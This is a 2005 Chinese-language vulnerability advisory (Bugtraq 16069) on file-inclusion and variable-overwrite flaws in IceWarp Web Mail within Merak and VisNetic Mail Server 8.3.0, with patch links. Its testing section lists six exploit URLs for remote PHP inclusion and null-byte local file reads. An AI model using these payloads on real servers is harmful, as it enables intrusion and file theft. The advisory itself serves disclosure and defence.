发布日期：2005-12-26
更新日期：2005-12-26

受影响系统：

Merak Mail Server,Inc MERAK Mail Server 8.3.0.r
Deerfield VisNetic Mail Server 8.3.0 build 1

不受影响系统：

Merak Mail Server,Inc MERAK Mail Server 8.3.5.r
Deerfield VisNetic Mail Server 8.3.5

描述：

---

BUGTRAQ  ID: 16069

IceWarp Web Mail（冰星网上邮件系统）是支持中日文邮件的Web Mail服务器引擎。

IceWarp Web Mail中存在多个输入验证漏洞，具体如下：

1) webmail和webadmin服务运行启用了register_global的PHP。在直接访问脚本时没有正确的初始化/accounts/inc/include.php和/admin/inc/include.php中的language和lang_settings变量，这可能允许覆盖变量，导致脚本包含本地或远程来源的任意PHP脚本。

2) 没有正确验证/dir/include.html中对lang参数的输入，导致可能包含本地资源的任意文件。

3) 没有正确验证/mail/settings.html中对language参数的输入，如果同覆盖lang_settings变量结合使用的话，就可能包含本地或远程资源的任意PHP脚本。

4) 如果/mail/include.html遇到了无法识别的HTTP_USER_AGENT字符串的话，就可能无法正确的初始化default_layout和layout_settings变量。同覆盖default_layout和layout_settings变量结合使用的话就可能导致泄漏本地文件内容。

<*来源：Tan Chew Keong （chewkeong@security.org.sg）
  
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=113570957209182&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

http://[host]:32000/accounts/inc/include.php?language=0&lang_settings[0][1]=http://[host]/
http://[host]:32000/admin/inc/include.php?language=0&lang_settings[0][1]=http://[host]/
http://[host]:32000/dir/include.html?lang=[file]%00
http://[host]:32000/mail/settings.html?id=[current_id]&Save_x=1&language=TEST
http://[host]:32000/mail/index.html?id=[current_id]&lang_settings[TEST]=test;http://[host]/;
http://[host]:32000/mail/index.html?/mail/index.html?default_layout=OUTLOOK2003&layout_settings[OUTLOOK2003]=test;[file]%00;2

建议：

---

厂商补丁：

Deerfield
---------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://www.deerfield.com

Merak Mail Server,Inc
---------------------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://www.merakmailserver.com/

浏览次数：3817
严重程度：0（网友投票）